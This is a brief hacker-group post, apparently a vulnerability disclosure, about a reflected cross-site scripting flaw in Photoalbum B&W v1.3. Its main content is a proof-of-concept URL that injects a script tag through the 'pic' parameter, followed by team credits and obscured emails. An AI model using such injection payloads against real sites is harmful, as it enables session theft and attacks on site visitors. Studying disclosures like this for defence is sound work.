<<< Date Index >>>     <<< Thread Index >>>

Xss exploit in Photoalbum B&W v1.3



Xss exploit in Photoalbum B&W v1.3

forum type : Photoalbum B&W v1.3
bug found by : black-code & sweet-devil
team : site-down
type : Xss

####################################################
exploit :


http://www.example.com/superalbum/index.php?pic='><script>alert(10)</script>

####################################################

path to admin login:

#######################
emails: 

black-cod3@xxxxxxxxxxx  &  gamr-14@xxxxxxxxxxx
#######################


All my respect to our friends , lezr.com , g123g.net 


done .. peace